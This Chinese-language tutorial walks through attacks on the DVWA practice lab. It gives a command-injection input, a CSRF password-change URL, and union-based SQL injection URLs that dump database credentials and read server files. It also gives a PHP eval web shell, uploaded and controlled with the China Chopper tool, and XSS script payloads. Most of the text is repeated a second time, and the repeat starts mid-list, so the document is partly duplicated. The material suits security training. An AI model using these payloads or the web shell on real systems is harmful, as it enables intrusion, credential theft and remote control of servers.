一、“Command Execution Vulnerability”-“命令注入漏洞”
127.0.0.1&&net user
二、“Cross Site Request Forgery”-“跨站请求伪造”
在空白的浏览器地址栏中输入以下RUL:
http://192.168.44.130/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change,
输入完成后我们可以看到,窗口提示密码修改成功。这时密码已经修改为:password。
通过电子邮件/聊天软件发送你精心构造的URL,可以直接修改当前用户的配置
三、SQL注入
1、检测漏洞是否存在,可以使用order by语句
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 2 +--+&Submit=Submit
‘2’为猜想的字段个数
2、确定字段个数
select id=1 ' order by 2
select * from users union select 1,2,3,4,5,6;
3、显示输出位置
union select 1,2
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,2 +--+&Submit=Submit
4、通过这些显示位置来输出我们想要的信息
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,concat_ws(char(32,58,32),user(),database(),version()) +--+&Submit=Submit
5、我们也可能通过显示schemata表,来得到当前数据库中的所有表。
URL: http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,schema_name from information_schema.schemata +--+&Submit=Submit
6、 显示数据库当前用户名和密码:concat(user,':',password)from mysql.user
URL:http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,concat(user,':',password)from mysql.user+--+&Submit=Submit
7、 显示某目录下的文件内容:load_file(‘/etc/gdm/failsafeBlacklist’)
URL:http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,load_file(‘/etc/gdm/failsafeBlacklist’) +--+&Submit=Submit
8、 上传文件:<?php @eval($_POST['123']);?> into outfile
四、“File Upload”-“文件上传漏洞”
1、上传有以下内容的PHP文件:
<?php @eval($_POST['123']);?>
2、打开“中国菜刀”-添加如下
URL:http://127.0.0.1/dvwa/hackable/uploads/bb(自己上传的木马文件).php
-文件管理,可以直接管理文件系统。
五、XSS攻击
1、“Reflected Cross Site Scripting (XSS)”-“反射型跨站脚本攻击”
<script>alert(/XXX/)</script>
2、“Stored Cross Site Scripting (XSS)”-“存储型跨站脚本攻击”
在提交的文本框中输入“<script>alert(/XXX/)</script>”,提交成功后,以后只要访问该页面就会弹出对话框。
127.0.0.1&&net user
二、“Cross Site Request Forgery”-“跨站请求伪造”
在空白的浏览器地址栏中输入以下RUL:
http://192.168.44.130/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change,
输入完成后我们可以看到,窗口提示密码修改成功。这时密码已经修改为:password。
通过电子邮件/聊天软件发送你精心构造的URL,可以直接修改当前用户的配置
三、SQL注入
1、检测漏洞是否存在,可以使用order by语句
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 2 +--+&Submit=Submit
‘2’为猜想的字段个数
2、确定字段个数
select id=1 ' order by 2
select * from users union select 1,2,3,4,5,6;
3、显示输出位置
union select 1,2
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,2 +--+&Submit=Submit
4、通过这些显示位置来输出我们想要的信息
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,concat_ws(char(32,58,32),user(),database(),version()) +--+&Submit=Submit
5、我们也可能通过显示schemata表,来得到当前数据库中的所有表。
URL: http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,schema_name from information_schema.schemata +--+&Submit=Submit
6、 显示数据库当前用户名和密码:concat(user,':',password)from mysql.user
URL:http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,concat(user,':',password)from mysql.user+--+&Submit=Submit
7、 显示某目录下的文件内容:load_file(‘/etc/gdm/failsafeBlacklist’)
URL:http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,load_file(‘/etc/gdm/failsafeBlacklist’) +--+&Submit=Submit
8、 上传文件:<?php @eval($_POST['123']);?> into outfile
四、“File Upload”-“文件上传漏洞”
1、上传有以下内容的PHP文件:
<?php @eval($_POST['123']);?>
2、打开“中国菜刀”-添加如下
URL:http://127.0.0.1/dvwa/hackable/uploads/bb(自己上传的木马文件).php
-文件管理,可以直接管理文件系统。
五、XSS攻击
1、“Reflected Cross Site Scripting (XSS)”-“反射型跨站脚本攻击”
<script>alert(/XXX/)</script>
2、“Stored Cross Site Scripting (XSS)”-“存储型跨站脚本攻击”
在提交的文本框中输入“<script>alert(/XXX/)</script>”,提交成功后,以后只要访问该页面就会弹出对话框。